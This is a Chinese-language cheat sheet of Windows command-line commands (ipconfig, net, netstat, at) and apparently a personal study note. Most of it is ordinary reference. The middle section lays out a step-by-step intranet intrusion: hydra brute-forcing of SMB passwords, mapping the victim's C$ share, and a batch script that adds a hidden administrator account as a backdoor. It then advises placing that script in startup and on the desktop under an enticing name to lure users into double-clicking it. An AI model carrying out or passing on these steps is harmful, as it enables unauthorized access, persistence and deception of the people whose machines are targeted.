1.color+参数（可用？查询） 命令行颜色更改：颜色属性由两个十六进制数字指定 – 第一个对应于背景，第二个对应于前景。
2.ipconfig /release 释放ip
3.ipconfig /renew 重新获取ip
4.systeminfo 获取系统信息
5.arp -a 获取局域网内所有活动接口
6.net view 查看局域网内其他计算机名称
7.ping [-t] [-a] [-n] [-l ]+ip： -t 无限ping; -a 显示对方主机名；-n+数量 发送数据包的数量；-l+大小 数据包大小
8.shutdown -s/-r -t 秒数 -c “提示信息”： -s关机、-r重启
9.shutdown -a：取消关机命令
10.dir/cd:查看/切换目录
11.start 文件/网址： 打开文件/网址
12.md/rd 文件夹名：创建/删除文件夹
13.copy con [路径]文件名：不加路径在当前目录下创建文件，命令执行后可输入文件内容，CTRL+Z结束输入
14.type 文件名：回显文件内容
15.del 文件名：删除文件
16.rename 原文件名 新文件名：重命名
17.copy 原文件名 路径：复制
18.move 原文件名 路径：移动
19.tree：目录树结构表示
20.telnet：远程链接

---

21.net use k: \192.168.0.2\c$ : 将192.168.0.2的c盘作为一个新的k盘映射到本地
需要用户名和密码，可配合hydra爆破使用
22.net user：查看当前所有用户
23.net user 账号 密码 /add:添加用户
24.net localgroup administrators 用户名 /add:将用户添加到管理员组（提权）
25.net user 用户名 /del :删除用户
26.net user guest /active:yes ：激活用户guest
27.net user 用户名：查看账户属性
28.net user guest 12345：guest用户登录后更改密码为12345
29.net password 12345： 更改系统登录密码为12345
30.net share ：查看本地开启的共享
31.net share ipc$ : 开启ipc$ 共享
32.net share ipc$ /del : 删除ipc$ 共享
33.net share c$ /del : 删除c盘共享
34.net start：查看开启了哪些服务，后接服务名即可开启指定服务
35.net stop 服务名：停止服务

一次简单内网渗透例子：

（1.寻找同一局域网的目标
    arp -a  
（2.hydra密码爆破
    hydra.exe -l administrator -P 密码字典 ip smb
（3.磁盘映射
    net use k: \\ip\c$
（4.输入爆破获得的账号密码，磁盘映射成功
（5.创建账号留后门（使用bat脚本）
    copy con c:\1.bat
        net user fnj 123 /add
        （6.提权
        net localgroup administrators fnj /add
（7.将脚本放入启动项，桌面也放一个（名字起花哨点，引诱双击）

---

36.netstat -a ： 查看开启了哪些端口，通常使用netstat -an
37.netstat -n ： 查看端口的网络链接情况，通常使用netstat -an
38.netstat -o : 查看活动端口
39.netstat -v ： 查看正在进行的工作

---

win10已经启用at命令
40.at ： 查看当前已有的计划任务
41.at id号 ： 开启已经注册过的某个计划任务
42.at 16：00 shutdown ： 添加计划任务，下午4点关机
43.at /delete : 停止所有计划任务
44.at id号 /delete : 停止某个计划任务